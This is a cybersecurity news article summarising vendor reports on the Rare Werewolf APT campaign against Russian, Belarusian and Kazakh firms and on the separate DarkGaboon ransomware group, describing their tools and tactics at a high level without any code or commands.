The Rare Werewolf advanced persistent threat (APT) group reportedly targeted hundreds of Russian industrial firms and engineering institutions in a stealth cyber campaign. The attacks also extended to Belarus and Kazakhstan and leveraged legitimate third-party software, making both attribution and detection significantly harder.
Kaspersky identified Rare Werewolf also known as Librarian Ghouls or Rezet as the actor behind the operation. Active since at least 2019, the group is known for targeting organizations in Russia and Ukraine. According to Kaspersky, Rare Werewolf favors PowerShell scripts and command files over custom malware.
Phishing Used as Primary Entry Vector
The group’s initial access was reportedly achieved via phishing emails. Password-protected archive files were used to lure victims into executing malicious payloads. These payloads included a legitimate utility called 4t Tray Minimizer, which can reduce running applications to the system tray, effectively concealing attacker activity.
FCRF x CERT-In Roll Out National Cyber Crisis Management Course to Prepare India’s Digital Defenders
After deployment, the malware chain used additional tools like Defender Control and Blat. Attackers used Blat to exfiltrate stolen data via SMTP to email servers under their control.
Sophisticated Use of Scheduled Access via AnyDesk
Attackers embedded a unique PowerShell script in the payload to automate remote access to the victim’s machine each day between 1 a.m. and 5 a.m. local time. They used AnyDesk to maintain remote control, enabling stealthy operations during low-activity hours. After the activity window, the system would automatically shut down via a scheduled task.
Credential Theft and Cryptomining Goals
According to BI.ZONE, the campaign’s objectives included the theft of credentials, documents, and Telegram data. Attackers deployed tools like Mipko Employee Monitor, WebBrowserPassView, and Defender Control to disable antivirus software and extract sensitive data. They also installed the XMRig cryptocurrency miner on infected systems to exploit computing resources.
Algoritha: The Most Trusted Name in BFSI Investigations and DFIR Services
The disclosure comes as Positive Technologies reported a separate financially motivated group dubbed DarkGaboon, which has been targeting Russian entities using the LockBit 3.0 ransomware. First observed in early 2025, DarkGaboon operates independently of the LockBit RaaS affiliate network and uses publicly available tools like XWorm and Revenge RAT, without evidence of data exfiltration.
Detection Challenges Escalate
Security researchers highlighted that the use of well-known legitimate software by both Rare Werewolf and DarkGaboon makes detection difficult and complicates attribution. Kaspersky noted:
“It is a common technique to leverage third-party legitimate software for malicious purposes, which makes detecting and attributing APT activity more difficult.”
As cyberattacks grow more sophisticated and APT groups blend into normal system activity, security experts urge organizations to enhance behavioral monitoring and endpoint visibility to detect and counter stealthy threats.
About the author – Ayush Chaurasia is a postgraduate student passionate about cybersecurity, threat hunting, and global affairs. He explores the intersection of technology, psychology, national security, and geopolitics through insightful writing.